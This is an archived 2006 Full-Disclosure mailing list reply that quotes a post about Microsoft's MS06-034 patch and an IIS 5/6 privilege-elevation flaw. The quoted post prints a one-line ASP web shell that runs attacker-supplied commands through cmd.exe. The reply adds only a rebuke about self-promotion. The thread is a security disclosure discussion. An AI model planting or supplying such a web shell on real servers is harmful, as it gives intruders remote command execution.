| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 25 Jul 2006 23:28:39 -0500
From: <daylasoul@...h.com>
To: <full-disclosure@...ts.grok.org.uk>
Cc:
Subject: Re: MS06-034 lies? IIS 6 can still be owned?
On Tue, 25 Jul 2006 19:39:23 -0500 Cesar <cesarc56@...oo.com> wrote:
>Hi all.
>
>After early getting the details of MS06-034 I thought
>it will be cool to build the exploits since there has
>been long time without any IIS exploit and our
>customers (see *1) will like it, so I asked the guys
>to build the exploits and that I will take care of the
>part of elevating privileges since I had some theory
>that there was a way to elevate privileges.
>What was funny is that some time later I realized that
>if you can upload an asp page then it's pretty simple
>to have a remote shell running under the same account
>that the exploits would run:
>
>-----shell.asp (got this from xfocus.org)------
><%=server.createobject("wscript.shell").exec("cmd.exe
>/c " & request("command")).stdout.readall%>
>-------------------------------------------
>So I wonder why MS patched the vulnerability if it's
>pretty simple to have a remote shell on default
>configurations?
>
>Mabye because wscript.shell can be disabled, removed,
>etc. or you can't run nor upload .exe on the server,
>in these cases the exploit will be handy.
>
>Also MS stated:
>-----------------------------
>on Mitigating Factors ....
>
> On IIS 5.0 and IIS 5.1, ASP enabled applications by
>default run in the 'Pooled Out of Process'
>application, which means they run in DLLHOST.exe,
>which is running in the context of the low privilege
>IWAM_<machinename> account.
>
> By default, ASP is not enabled on IIS 6.0. If ASP is
>enabled, it runs in the context of a W3WP.exe worker
>process running as the low privilege 'NetworkService'
>account.
>
>on FAQ Workarounds...
>-What might an attacker use the vulnerability to do?
>An attacker who successfully exploited this
>vulnerability could take complete control of the
>affected system.
>
>----------------------
>That's pretty confusing since they are saying IIS 5 &
>6 runs under a low privileged accounts and then they
>say an attacker could take complete control...???
>
>My theory on the elevation of privileges was in part
>wrong but I could elevate privileges so now the
>exploits can also give you a remote shell under an
>administrative account which I think this is why MS
>patched the vulnerability.
>While MS fixed the ASP vulnerability they didn't fixed
>a design flaw that allows to elevate privilges if you
>can run code under IIS 5 & 6 low privileged accounts
>:)
>
>So no matter if you applied the fix, if you let users
>to upload an run binaries from ASP pages on default
>settings then your server can still be owned.
>
>
>
>Cesar.
>(*1 http://www.argeniss.com/products.html)
>
>__________________________________________________
>Do You Yahoo!?
>Tired of spam? Yahoo! Mail has the best spam protection around
>http://mail.yahoo.com
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
please note that self-promotion is forbidden on the list.
Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists